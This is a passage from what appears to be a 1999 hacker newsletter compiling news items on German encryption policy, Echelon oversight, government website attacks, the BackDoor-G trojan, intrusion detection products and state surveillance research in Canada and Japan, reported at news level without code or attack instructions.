http://www.wired.com/news/news/politics/story/20023.html
Wired;
Germany Endorses Strong Crypto
Wired News Report
5:20 p.m. 3.Jun.99.PDT
In an apparent response to corporate
spying allegedly conducted in Europe by
the United States, Germany is
encouraging citizens and businesses to
use strong cryptography.
"[Germany] considers the application of
secure encryption to be a crucial
requirement for citizens' privacy, for the
development of electronic commerce, and
for the protection of business secrets,"
reads a translated version of a policy
framework document released Wednesday
by Germany's Federal Ministry of
Economic Affairs and Technology.
"The federal government will therefore
actively support the distribution of secure
encryption. This includes in particular
increasing the security consciousness of
citizens, business, and administration."
Australia recently became the first nation
to admit it participates in Echelon, a
previously secret global surveillance
network capable of intercepting
electronic communications anywhere in
the world.
Echelon is said to be principally operated
by the United States' National Security
Agency and its UK equivalent, the
Government Communications
Headquarters. In addition to Australia,
the system relies on cooperation with
other signals-intelligence agencies in
Canada and New Zealand.
Earlier this month, UK investigative
journalist Duncan Campbell submitted
Interception Capabilities 2000, his report
on Echelon, to the European Parliament's
Science and Technology Options
Assessment Panel.
Campbell had been asked to investigate
the system in the wake of charges made
last year in the European Parliament that
Echelon was being used to funnel
European government and industry
secrets into US hands. In the wake of the
report, the Australian government
confirmed the Echelon alliance to media in
follow-up interviews.
Though Wednesday's German government
statement does not mention Echelon, the
document alludes to the specter of
industrial espionage.
"For reasons of national security, and the
security of business and society, the
federal government considers the ability
of German manufacturers to develop and
manufacture secure and efficient
encryption products indispensable," the
statement said.
The government added that it would take
additional measures to strengthen its
domestic crypto software industry.
The policy also cautioned that while
encryption may be used to criminal ends,
the need to protect electronic commerce
overrides any such concerns. The
department said it would prepare and
release a report on the criminal uses of
cryptography within two years.
The US government restricts the export
of strong crypto on the grounds that it
might be used by terrorists and hostile
nations to conceal communications.
-=-
Policy statement;
Federal Ministry of the Interior
Federal Ministry of Economic Affairs and Technology
Bonn, June 2, 1999
Cornerstones of German Encryption Policy
The Federal Cabinet in its session of June 2 agreed on the German position on the use of cryptographical methods in e-commerce in the form of Cornerstones of
German Encryption Policy.
The government followed the necessity to take position in this nationally and internationally vital question important for business and e-commerce. Security problems are
on the rise with growing traffic on the net. Experts are estimating the losses caused by espionage, manipulation, or damaging of data by billions. Data security is
becoming a serious issue with global competition and because of that is affecting jobs in respective businesses.
Improved protection of German users on the net by means of better encryption methods is the main concern of this decision. It states clearly that cryptographic methods
and products are furthermore permitted to be developed, produced, and used without any restrictions. The yet low awareness towards this issue shall be raised by this
decision. The initiative Security On The Net by ministries of economic affairs and interior is meant to serve the same purpose <http://www.sicherheit-im-internet.de>
Another main aim of the German federal government is to strengthen productivity and international competitiveness of the German suppliers in encryption business
which are likely to intensify their efforts with regards to a growing demand. The further opening of the European single market is serving the same purpose: Germany
together with its European partners abolished supervision of encryption mass products exported within the EU by revising the EU-dual-use-decree. Simplification of
export supervision procedure are under examination by the Bundesausfuhramt (federal export agency?)
With the use of cryptography on the raise improper use cant be ruled out. Therefore the involved ministries will be watching further development thoroughly and deliver
a report after 2 years. Efforts to improve the technical equipment of law enforcement agencies are underway.
With this well-balanced position the federal government met the requirements for Germany being a secure and productive site in the information age.
Cornerstones of German Crypto Policy
Introduction
Hard- and software for message encoding remained until the beginning of the nineties a negligible niche market. However this niche market is now of considerable
importance to the economic and social development in the information age. The input information is developing more and more into a much demanded raw material.
Effectively protecting this asset could can be crucial to corporate success and thus determine on prospective employment. This protection today can be effectively
ensured only by use of strong encryption tools.
Controversy on encryption in Germany
The controversy on encryption is about whether or not and to which extent cryptography should be restricted by law. This point has been discussed recently in many
democratic industrial countries in a controversial way. An intensive argument took place in Germany too, with several ministries, industry, and numerous social groups
participating.
In October 1997 the federal cabinet passed the Federal report: Info 2000: Germany's way into the information age, containing a passage on cryptography:
The Federal Government agrees on waiving to regulate by law the trade and use of cryptographic products and methods. Thus the unrestricted freedom
of users with choosing and use of encryption systems remains not affected. The Federal Government will watch further development in the field of
cryptography thoroughly particularly within a European and international context. Further measures to reach its goals will be taken if necessary.
So far the Federal Government has not taken stand definitely and unequivocally.
Cryptography and economic interests
Due to the dynamic development of digital business dealings the markets for encryption products note high growth rates. Besides the traditional protection of confidence
by now encryption systems are mainly used e.g. for digital copyright protection, digital signatures, and digital cash. Beyond this cryptography is a
cross-section-technology indispensable for architecture and development of complex e-commerce applications. Indirectly much bigger markets are concerned like e.g.
telecommunication, online-banking, or tele-medicine.
Its true that present-day security standards, few years ago affordable only to large-scale enterprises and administration, are now within means of medium-sized and
small enterprises as well as private households. But still in Germany cryptography is not used in the required degree. The necessary security awareness is lacking
frequently even though considerable losses can be caused by espionage, manipulation, or destruction of data. German crypto manufacturers would have a good chance
of keeping up with international competition, if appropriate conditions are ensured. In view of the strategic meaning of the cryptographic sector many important industrial
states spare no effort in order to strengthen their economical and technical capacities.
Cryptography and security interests
Cryptographic methods are of outstanding importance for efficient technical crime protection. That applies to ensuring of authenticity and integrity in data traffic as well
as protection of confidence.
On the other hand protection of confidence is in favor of perpetrators: With cryptographic applications becoming more user-friendly spreading into criminal circles has to
be expected. This could cause serious problems for law enforcement. Lawful surveillance ordered by a court has to remain effective even if the target guards
concerned information with a cryptographic system.
Up to now abuse of encryption constitutes no serious problem for law enforcement. However there cant be derived a forecast from this. It is necessary to actively
examine possible consequences with regard to the specific needs of law enforcement and national security to early identify any undesirable development and take
effective action against them based on alternative strategies.
With the recent national discussion as well as the international development as foundations the Federal Government agrees on the following
cornerstones of encryption policy:
1. The Federal Government is not intended to restrict the general availability of cryptographic products in Germany. It recognizes the crucial importance of secure
encryption for data protection, development of electronic business dealings, and protection of corporate secrets. Therefore the Federal Government will actively support
spreading of secure encryption in Germany. This is meant to particularly promote awareness on security issues among business, administration, and private people.
2. The Federal Government aims at strengthening users to trust in cryptographic security. It will take measures to establish a trust framework for secure cryptography,
particularly by improving the ability to check cryptographic products on security and recommending of qualified products.
3. The Federal Government considers the capability of German manufacturers to develop and manufacture secure and powerful cryptographic products as crucial to
security of nation, business, and society. It will take actions to improve the international competitiveness in this field.
4. The legal authority of law enforcement and security agencies to keep telecommunication under surveillance shall not be eroded by dissemination of strong methods for
encryption. Therefore the competent ministries will be watching further development thoroughly and report after 2 years. Irrespective of that the Federal Government
will support improving technical competence of law enforcement within the bounds of its possibilities.
5. The Federal Government sets a great store by international cooperation in the field of encryption. It stands up for market-developed open standards as well as
interoperable systems and will speak up for strengthening of multi- and bilateral cooperation.
@HWA
36.0 US Congress Demands Echelon Docs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Code Kid
An amendment to the fiscal 2000 Intelligence
Authorization Act proposed last month by Sen. Bob Barr
(R-Ga.) will force the director of Central Intelligence,
the director of NSA and the attorney general to submit
a report to Congress that outlines the legal standards
being employed to safeguard the privacy of American
citizens against Project Echelon.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0531/web-nsa-6-3-99.html
JUNE 3, 1999 . . . 18:34 EDT
Congress, NSA butt heads over Echelon
BY DANIEL VERTON (dan_verton@fcw.com)
Congress has squared off with the National Security Agency over a
top-secret U.S. global electronic surveillance program, requesting top
intelligence officials to report on the legal standards used to prevent privacy
abuses against U.S. citizens.
According to an amendment to the fiscal 2000 Intelligence Authorization Act
proposed last month by Rep. Bob Barr (R-Ga.), the director of Central
Intelligence, the director of NSA and the attorney general must submit a report
within 60 days of the bill becoming law that outlines the legal standards being
employed to safeguard the privacy of American citizens against Project
Echelon.
Echelon is NSA's Cold War-vintage global spying system, which consists of a
worldwide network of clandestine listening posts capable of intercepting
electronic communications such as e-mail, telephone conversations, faxes,
satellite transmissions, microwave links and fiber-optic communications traffic.
However, the European Union last year raised concerns that the system may be
regularly violating the privacy of law-abiding citizens [FCW, Nov. 17, 1998].
However, NSA, the supersecret spy agency known best for its worldwide
eavesdropping capabilities, for the first time in the history of the House
Permanent Select Committee on Intelligence refused to hand over documents
on the Echelon program, claiming attorney/client privilege.
Congress is "concerned about the privacy rights of American citizens and
whether or not there are constitutional safeguards being circumvented by the
manner in which the intelligence agencies are intercepting and/or receiving
international communications...from foreign nations that would otherwise be
prohibited by...the limitations on the collection of domestic intelligence," Barr
said. "This very straightforward amendment...will help guarantee the privacy
rights of American citizens [and] will protect the oversight responsibilities of the
Congress which are now under assault" by the intelligence community.
Calling NSA's argument of attorney/client privilege "unpersuasive and dubious,"
committee chairman Rep. Peter J. Goss (R-Fla.) said the ability of the
intelligence community to deny access to documents on intelligence programs
could "seriously hobble the legislative oversight process" provided for by the
Constitution and would "result in the envelopment of the executive branch in a
cloak of secrecy."
@HWA
37.0 Windows2000 Already Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by 0Day
Officials in Singapore have confiscated over 700 pirated
copies of Microsoft Windows2000 from area merchants.
Raids last Monday turned up the software at two
different retailers in residential areas of Katong and
Kallang, Singapore. Windows2000 has not yet been
officially released.
The Straits Times
http://web3.asia1.com.sg/archive/st/4/cyb/cyb1_0603.html
JUN 3 1999
Pirated Office 2000 being sold
PIRATED copies of Microsoft Office 2000 are already
being sold here though the official launch of the new
software takes place only next Monday. Two raids last
Monday turned up the pirated copies. They were found at
two retail outlets in residential areas at Katong and
Kallang. Microsoft Singapore said in a statement on
Tuesday that its representatives and the Intellectual
Property Rights Warrant Unit seized about 700
CD-ROMs containing pirated software.
Microsoft's regional anti-piracy spokesman Rebecca Ho
said: "This is an illustration of the pervasiveness of the
problem and the speed with which pirates operate."
Microsoft warns that counterfeit software can contain
viruses that could cause problems to a computer's
software and hardware, and cost hundreds or thousands
of dollars to fix.
@HWA
38.0 NetBus Takes #1 Spot
~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by judd
After given a 5 cow review from TUCOWS Netbus Pro,
the remote administrartion software recently turned
shareware has reached the #1 spot at DaveCentral
after only five dayss.
Dave Central
http://www.davecentral.com/hot.html
NetBus
http://www.netbus.org
@HWA
39.0 [ISN] Police will have 24-hour access to secret files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.the-times.co.uk/news/pages/tim/99/05/27/timnwsnws01019.html?999
May 27 1999 BRITAIN
Police will have 24-hour access to secret files
Stewart Tendler
E-mail code-busters to join crime fight
A 24-HOUR technical centre to help to crack secret Internet and e-mail
systems used by criminals is being set up by the computer industry and the
police.
The centre will open encrypted messages for officers who have a warrant.
If the codes cannot be cracked it will call in computer specialists.
Ministers are also introducing laws giving police and Customs
investigators powers to order Internet operators to unlock encrypted
systems for taps. Users could also be forced to hand over codes protecting
information.
The plans were announced yesterday as ministers released a report by the
Cabinet Office's Performance and Innovation Unit on the problems of
encryption and police investigations.
The report revealed that telephones taps last year led to the seizure of
three tonnes of heroin and cocaine and the arrest of 1,200 criminals.
Underlining that interceptions have become an "essential tool" the report
said that one suspect involved in serious crime was arrested for every two
warrants issued by Jack Straw, the Home Secretary.
Interceptions became vital when intelligence could not be obtained by
surveillance or informants. In 1996-97 the taps resulted in the seizure of
450 guns and 112 tonnes of drugs, such as cannabis, worth #600 million.
Looking at ways of dealing with the rise of encryption programmes for
e-mail and telephone systems, the report found that although there was
general public acceptance of current telephone taps there was strong
aversion in some areas to secret police access to the Internet.
The Government has already ruled out creating an authority which would
hold the "keys" to encrypted systems sold by licensed firms and allow
access to investigators. The report concluded that such a plan would be
unwieldy and still would not give police enough access.
Yesterday Mr Straw said the plans showed that government and industry
could work together. The aim was to develop the use of the Internet for
commerce without encouraging or helping crime.
Case histories released yesterday show how terrorists and paedophiles are
already using encryption and slowing or halting investigations.
In 1995 two men were arrested in the Home Counties and accused of being at
the centre of a ring putting out child pornography. Detectives believed
that encrypted material had been sent worldwide. The men were later jailed
but 10 per cent of the material was never uncovered. Last year police
investigating sex and attempted murder allegations found encrypted
material on a suspect's computer. They finally cracked the code when they
discovered the decryption key among other material.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
40.0 [ISN] Hack
attack knocks out FBI site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
FBI cracks down on hacker group -- then fbi.gov is knocked offline by hack
attack.
By Bob Sullivan and Brock Meeks, MSNBC
May 26, 1999 6:44 PM PT
A skirmish between the FBI and a well-known hacker group seemingly erupted
Wednesday.
Not long after federal agents served search warrants on members of hacker
group Global Hell (gH), probably in connection with recent attacks on U.S.
government computers, the FBI's own Web site was attacked and is currently
offline.
Earlier on Wednesday, MSNBC was told by a member of gH that the FBI had
served search warrants on several members of the hacker group. Last week,
gH member Eric Burns (who also goes by the name Zyklon), was arrested in
connection with three separate attacks on U.S. government computers,
including systems at the U.S. Information Agency.
A hacker identifying himself as "Most Hated," the founder of gH, told
MSNBC he was raided by agents at about 6 a.m. Wednesday morning in what he
described as a "a huge hacker crackdown."
He said he knows of nine people who were raided by government officials --
including four in Houston, three in California and one in Seattle. None
was arrested, but all had computer equipment confiscated, he said.
Late Wednesday, www.fbi.gov stopped working.
Credit claimed for hack
According to the Web site www.antionline.com, an individual calling
himself Israeli Ghost was taking credit for the attack on the FBI's
site.
The FBI was not immediately available to comment.
"FBI WILL NOT {expletive deleted} WITH MY FRIENDS FROM GLOBAL HELL," the
hacker allegedly wrote in an e-mail to Antionline.
Other members of the hacking community, contacted by MSNBC, said the FBI
site was hit by what's called a denial of service attack. In such an
attack, the host computer is not actually controlled by an outsider;
rather, outsiders bombard a Web site with so many simultaneous hits that
it becomes overwhelmed and can no longer function.
Most Hated said he didn't know who was responsible for the DOS attack. He
said the FBI agents who raided him said the raid was in connection with
"illegal telecom activity," which he believes is related to fraudulent
teleconferences he set up.
White House hack connection
"The FBI told me that they were looking into illegal telecom activity,"
Most Hated told MSNBC. "The FBI said some company lost $250,000."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
41.0 [ISN] What's a Little Hacking Between Friends?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.zdnet.com/zdtv/siliconspin/features/story/0,3725,2245017,00.html
What's a Little Hacking Between Friends?
Spin debates hacking: Enjoyable hobby or criminal activity?
How much does hacking hurt? The companies hacked by Kevin Mitnick say the
intrusions cost them millions of dollars in lost business and damages--
and they're handing him a collective restitution bill of $300 million.
Mitnick's lawyer, Don Randolph, says it's moot. Mitnick has spent years in
jail, and when he gets out will be forbidden to touch a computer. Even
discounting his legal bills, Mitnick is broke.
Trying to decide how harmful hacking really is sent the Spin panel into a
tizzy. ZDTV's managing editor, Shauna Sampson, aligned with Forbes'
Dennis Kneale to play down the dark side of hacking, while Suzanne
Anderson from GlobalNet Ventures looked at the cost to businesses.
Finally, Spencer Ante of thestreet.com discussed how these financials can
affect the market.
[snip...]
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
42.0 [ISN] New hacker attack uses screensavers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.news.com/News/Item/0,4,37180,00.html?st.ne.fd.tohhed.ni
New hacker attack uses screensavers
By Erich Luening
Staff Writer, CNET News.com
May 28, 1999, 8:20 a.m. PT
A new Trojan horse program sent by a hacker over the Internet via an email
spam format as a screensaver could allow PCs to be accessed by
unauthorized users.
BackDoor-G Trojan horse is considered a potentially dangerous new Trojan
horse program that could allow hackers to remotely access and control
infected PCs over the Internet, according to network security and
management software maker Network Associates.
BackDoor-G affects Windows-based PCs. When executed, BackDoor-G turns a
user's system into a client system for a hacker, giving virtually
unlimited remote access to the system over the Internet. The Trojan also
is virtually undetectable by the user, although it has been reported as
spreading as a screensaver and an update to a computer game.
The program is the latest in a string of new hybrid security threats that
blur the line between viruses, security exploits, and malicious code
attacks, the company said.
BackDoor-G is difficult to detect because it is able to change its
filename and therefore hide from some traditional virus eradication
methods such as simply deleting suspicious files.
Though BackDoor-G is not technically a virus, Network Associates advises
PC users to request an update for both their antivirus and
intrusion-detection software from their system administrators.
Sal Viveros, group marketing manager for Total Virus Defense at Network
Associates, said the company has received a few dozen samples of the
attack since midmorning yesterday.
"There is no one file name it uses," he said. "It spreads everywhere in
the system.
"There is a trend here. We're seeing more and more programs that are
stealing information or creating holes to get access to systems remotely,"
Viveros added.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
43.0 [ISN] Hackers beware: IBM to sharpen Haxor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: root <root@packetstorm.harvard.edu>
http://www.zdnet.com/pcweek/stories/news/0,4153,2267089,00.html
Hackers beware: IBM to sharpen Haxor
By Jim Kerstetter, PC Week Online
May 27 1999 4:49 PM ET
Hackers beware: Haxor is watching you from its perch in IBM's wide-ranging
security suite.
This fall, Haxor is due for a face lift, along with IBM's Boundary Server
firewall. They are two components of IBM's FirstSecure suite of
applications, which includes everything from intrusion detection software
to anti-virus software in the company's wider SecureWay security strategy.
Haxor will gain several new features, including better scanning for
stealth attacks, such as low-bandwidth hacks and coordinated attacks from
different geographic points, and improved ability to detect mangled and
overlapping packets, company officials said. IBM (NYSE:IBM) is also trying
to improve Haxor's ability to filter out the white noise of regular
network traffic, tuning it down enough so it can catch stealth attacks
while not setting off frequent false alarms.
Haxor was developed at IBM's Global Security Analysis Lab, in Hawthorne,
N.Y., said Dave Safford, manager at the lab. There are two kinds of
intrusion detection applications: One is based on servers or hosts and
looks for attacks on that individual system; the other is network-based
and sniffs packets as they come into the network, trying to determine if
an attack is taking place.
Haxor is network-based and can be found within IBM's FirstSecure suite as
well as Tivoli Systems Inc.'s CrossSite network management suite. "There
is an incredible amount of data that comes out of these things," Safford
said. "It can be a real problem."
To solve the problem, Safford said, IBM has developed "dynamic
sensitivity," which will be able to correlate the difference between the
attacks and legitimate traffic.
Network administrators are particularly interested in integration with
management tools from companies such as Tivoli. "That makes the most sense
to me. I want to be able to manage this from one point," said Doug Mallow,
network administrator at a West Coast bank.
Also this fall, the Boundary Server firewall will be more tightly
integrated with the SecureSite Policy Director, said IBM officials. Using
the Common Content Inspection specification that is now under development,
Boundary Server should be able to improve on performance, essentially
sharing packets of data with other content inspection applications such as
Content Technology Inc.'s MIMESweeper for e-mail inspection and Finjan
Software Ltd.'s SurfinGate mobile code-scanning software.
IBM in January unveiled its SecureWay strategy for Internet and network
security. Like competing packages from Hewlett-Packard Co., SecureWay is
made up of both home-grown and OEM applications.
IBM also has developed a Security Policy Director to tie together its
security pieces.
IBM can be reached at (914) 499-1900 or www.ibm.com.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
44.0 [ISN] Feds Fend Off HACK3RZ
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Simon Taplin <sticker@icon.co.za>
Feds Fend Off HACK3RZ
You might want to resend any e-mails you fired off to the FBI or the U.S.
Senate yesterday. Hackers shut down both Web sites in a two-for-one attack
that online media outlets dug right into.
News.com reported that the attackers' intent was to crash the FBI site,
not intrude into its files. Are the perps international spies? Perhaps
double agents? International anarchists? Most likely they're adolescents
not old enough to drive, Alan Paller, director of research for the SANS
(System Administration, Networking and Security) Institute told News.com's
Paul Festa.
ZDNet scored with colorful details that indicate Paller might be right. It
ran with the story and reported that the Senate Web site, too, had been
downed Thursday evening. But the level of threat appears more comic book
than spy thriller, according to ZDNN reporter Joel Deane. Fbi.gov had been
hacked by a group called Global Hell, and the nefarious culprits behind
the Senate attack call themselves MAST3RZ 0F D0WNL0ADING, or M0D to their
friends. Turns out M0D taunted the feds with the message they left
plastered on senate.gov: "FBI vs. M0D in '99, BR1NG IT 0N!" ZDNet got into
the story, going so far as to mirror the M0D hack and engage the
assistance of CyberCrime's Luke Reiter.
Hackers Deface Senate, Challenge FBI
http://www.zdnet.com/zdnn/stories/news/0,4586,2267421,00.html?chkpt=hpqs014
No Security Lapse in FBI Hack Attack
http://www.news.com/News/Item/0,4,37138,00.html
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
45.0 [ISN] High-tech snooping tools developed for spy agency
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Putrefied Cow <waste@zor.hut.fi>
Originally From: Anonymous <nobody@replay.com>
Originally To: cypherpunks@toad.com
High-tech snooping tools developed for spy agency
The Vancouver Sun (May 24, 1999)
Jim Bronskill Southam Newspapers
OTTAWA -- Canada's electronic spy agency is quietly bankrolling the
development of cutting-edge systems that can identify voices, analyze
printed documents and zero in on conversations about specific topics.
Documents show the Communications Security Establishment has enlisted the
help of several leading Canadian research institutes to devise
state-of-the-art snooping tools.
CSE, an agency of the defence department, collects and processes
telephone, fax and computer communications of foreign states, corporations
and individuals. The federal government uses the intelligence gleaned from
the data to support troops abroad, catch terrorists and further Canada's
economic goals.
CSE and counterpart agencies in the United States, Britain, Australia and
New Zealand share intercepted communications of interest with one another,
effectively creating a global surveillance web, according to intelligence
experts.
CSE's interest in high-tech devices that help locate specific
conversations and documents is a clear indication the five-member alliance
collects and sifts large volumes of civilian traffic, said Bill Robinson,
a researcher in Waterloo, Ont., who has long studied the spy agencies.
"This technology is needed to process vast communications streams when
you're hunting for nuggets within it."
Robinson said the devices have legitimate uses, but hold "potentially
frightening" implications for people's privacy as the technology advances.
The Centre for Pattern Recognition and Machine Intelligence, located at
Concordia University in Montreal, received $355,000 to develop two systems
for CSE that automatically analyze printed documents, such as faxes, once
they are digitally captured in a computer data bank.
The first system, completed early last year, quickly determines the
language of a document, said the centre's C. Y. Suen.
"Some humans may have problems in distinguishing Spanish from Portuguese,
for example, or Spanish from Italian," he said. "So what we have developed
is a system that can do it automatically."
The second device electronically searches captured documents for distinct
features, including logos, photos, text or signatures.
Combining the two systems enables a user, for example, to search a data
bank for Japanese documents containing photos, or Russian faxes with
signatures.
Records obtained by Southam News under the Access to Information Act show
CSE commissioned several other projects during the last two years. They
include:
- An $84,981 contract with the University of Waterloo in Ontario for the
"development of multilingual computer speech recognition systems."
- A $115,000 agreement with the University of Quebec at Chicoutimi to
research "speaker identification" procedures.
- Work by the Centre de Recherche Informatique de Montreal on "topic
spotting" -- a means of identifying the subject of a conversation. The
$150,393 contract was the most recent of several awarded to CRIM.
CSE spokesman Kevin Mills did not provide information on specific goals of
the projects, but allowed: "In general, any research that we're funding
has some kind of interest for CSE."
The agency has been working on voice and phrase-detection systems for at
least a decade. The documents, however, show the research continues, with
some devices yet to be perfected.
CSE and its four international partner agencies use computers capable of
recognizing intercepted messages containing specified names, addresses,
telephone numbers and other key words or numbers, says a new report on
surveillance technology, by Scottish researcher Duncan Campbell.
However, Campbell found the agencies lack systems for homing in on
conversations featuring particular words.
CSE would have trouble picking out a phone call with the words
"assassination" or "revolution" because the speech recognition systems
developed to date cannot instantly recognize an unknown person's voice
traits.
"The key problem, which is familiar to human listeners, is that a single
word heard on its own can easily be misinterpreted, whereas in continuous
speech the meaning may be deduced from surrounding words," says
Campbell's report.
-=-=-=-=-
Spy agency developing powerful snoop tools
May 24, 1999
By JIM BRONSKILL Southam Newspapers
OTTAWA - Canada's electronic spy agency is quietly bankrolling the
development of cutting-edge systems that can identify voices, analyze
printed documents and zero in on conversations about specific topics.
Documents show the Communications Security Establishment has enlisted the
help of several leading Canadian research institutes to devise
state-of-the-art snooping tools.
CSE, an agency of the Defence Department, collects and processes
telephone, fax and computer communications of foreign states, corporations
and individuals. The federal government uses the intelligence gleaned from
the data to support troops abroad, catch terrorists and further Canada's
economic goals.
CSE and counterpart agencies in the United States, Britain, Australia and
New Zealand share intercepted communications of interest with one another,
effectively creating a global surveillance web, according to intelligence
experts.
CSE's interest in high-tech devices that help locate specific
conversations and documents is a clear indication the five-member alliance
collects and sifts large volumes of civilian traffic, said Bill Robinson,
a researcher in Waterloo, Ont., who has long studied the spy agencies.
"This technology is needed to process vast communications streams when
you're hunting for nuggets within it."
Robinson said the devices have legitimate uses, but hold "potentially
frightening" implications for people's privacy as the technology advances.
"They'll be able to do things they never could've done in the past."
The Centre for Pattern Recognition and Machine Intelligence, located at
Concordia University in Montreal, received $355,000 to develop two systems
for CSE that automatically analyze printed documents, such as faxes, once
they are digitally captured in a computer data bank.
The first system, completed early last year, quickly determines the
language of a document, said the centre's C. Y. Suen.
"Some humans may have problems in distinguishing Spanish from Portuguese,
for example, or Spanish from Italian," he said. "So what we have developed
is a system that can do it automatically."
The second device electronically searches captured documents for distinct
features, including logos, photos, text or signatures.
Combining the two systems enables a user, for example, to search a data
bank for Japanese documents containing photos, or Russian faxes with
signatures.
Records obtained by Southam News under the Access to Information Act show
CSE commissioned several other projects during the last two years. They
include:
(*) An $84,981 contract with the University of Waterloo in Ontario for the
"development of multilingual computer speech recognition systems."
(*) A $115,000 agreement with the University of Quebec at Chicoutimi to
research "speaker identification" procedures.
(*) Work by the Centre de Recherche Informatique de Montreal on "topic
spotting" - a means of identifying the subject of a conversation. The
$150,393 contract was the most recent of several awarded to CRIM.
CSE spokesman Kevin Mills did not provide information on specific goals of
the projects, but allowed: "In general, any research that we're funding
has some kind of interest for CSE."
The agency has been working on voice- and phrase-detection systems for at
least a decade. The documents, however, show the research continues, with
some devices yet to be perfected.
CSE and its four international partner agencies use computers capable of
recognizing intercepted messages containing specified names, addresses,
telephone numbers and other key words or numbers, says a new report on
surveillance technology, by Scottish researcher Duncan Campbell.
However, Campbell found the agencies lack systems for homing in on
conversations featuring particular words.
For example, CSE would have trouble picking out a phone call with the
words "assassination" or "revolution" because the speech recognition
systems developed to date cannot instantly recognize an unknown person's
individual voice traits.
"The key problem, which is familiar to human listeners, is that a single
word heard on its own can easily be misinterpreted, whereas in continuous
speech the meaning may be deduced from surrounding words," says
Campbell's report.
Montreal's CRIM is trying to get around the problem by devising the "topic
spotting" system, says the report.
In addition, intelligence agencies are using systems that recognize the
"voiceprint" or speech pattern of targeted individuals, though the
technology is not yet fully reliable.
[end]
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
46.0 [ISN] Privacy issues have taken center stage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
http://www.wired.com/news/print_version/business/story/19973.html?wnpg=all
(Wired News) TOKYO [6.2.99] -- Privacy issues have taken center stage as
Japan prepares to enact legislation allowing the police to eavesdrop on
phone calls, intercept fax and computer transmissions, and read email.
The draconian measures are ostensibly intended to help law enforcement
halt premeditated murders, trafficking in drugs and guns, and smuggling of
illegal aliens into Japan.
At least that's what a bill cobbled together by the country's coalition
government says.
The reality could be far more intrusive, especially after investigators
receive an official green light to comb through private correspondence and
communications.
Japanese citizens' groups -- a hodgepodge of activists with little actual
influence over policy decisions -- have decried the wiretapping
legislation as a gross invasion of privacy, and opposition politicians
boycotted a vote on the legislation last Friday. But the government
insists that what Japan needs to restore public order is less civil
liberty and more Big Brother.
People here are scared. Crime -- once unthinkable in Japan -- is on the
rise. The country's yakuza racketeers are growing increasingly bolder in
their schemes as nearly a full decade of recession eats away at
traditional revenue sources, such as payoffs from companies and corrupt
politicians.
For law-enforcement authorities, the trouble began back in 1995 when Aum
Shinrikyo cultists released sarin gas in the Tokyo subway, killing a dozen
people. The cops simply never saw the attack coming, and have been
agitating for greater surveillance powers as a means of preventing such
nastiness from happening again.
Wiretapping is a convenient shortcut for investigators. And, as the
pervasive eavesdropping of former East Bloc countries made undeniably
clear, once authorities start listening it's a hard habit to break.
Yozo Marutake, a former senior executive with a manufacturer of hearing
aids called Rion, said last week that the Japanese police have been
bugging phones for decades. How does he know this? Because his company
sold the cops all their surveillance gear, and had done so since first
being approached by authorities in 1957, he said.
So why would the Japanese police now be seeking legal backing for their
electronic skulking? One reason might have to do with charges from an
opposition politician last year that his phone had been bugged. The courts
upheld the politician's claims, although the cops never actually admitted
being behind the incident.
The Internet undoubtedly will be a low priority at first for Japan's
snoops, but this will change as more people, criminals included, go
online. For now, it looks like the cops are still unsure how to proceed
where matters of cyberspace are concerned.
Police last week raided the Sapporo home of an 18-year-old who had posted
a bunch of hit tunes on his home page using the MP3 compression format.
The teen, needless to say, hadn't worked out copyright issues in advance
with related Japanese recording companies.
Police didn't reveal how they learned about the song-laden site. But they
said they moved quickly to shut things down after concluding that illegal
actions were being perpetrated.
This only took them three months of monitoring downloads to figure out.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
47.0 [ISN] Whitehouse to punish Hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
http://www.news.com/News/Item/0,4,37257,00.html
(News.com) [6.1.99] WASHINGTON--Annoyed by a recent wave of attacks
against official U.S. government Web sites, the White House today warned
hackers who target federal Web sites that they will be caught and
punished.
"There's a government-wide effort to make sure that our computer systems
remain secure," White House Press Secretary Joe Lockhart said in a
briefing. "For those who think that this is some sort of sport, I think
[it will be] less fun when the authorities do catch up with them...and
these people are prosecuted," he said.
To protect against attacks that in recent days and weeks have disabled
sites run by the Energy Department, the FBI, the Senate, the Interior
Department, and the White House, the Defense Department said it planned to
shut down its Web site for a short time today, said Ken Bacon, the
Pentagon's chief spokesman.
"This is much more protective than reactive," Bacon said. "It's looking to
the future to prevent the types of problems that the other agencies" have
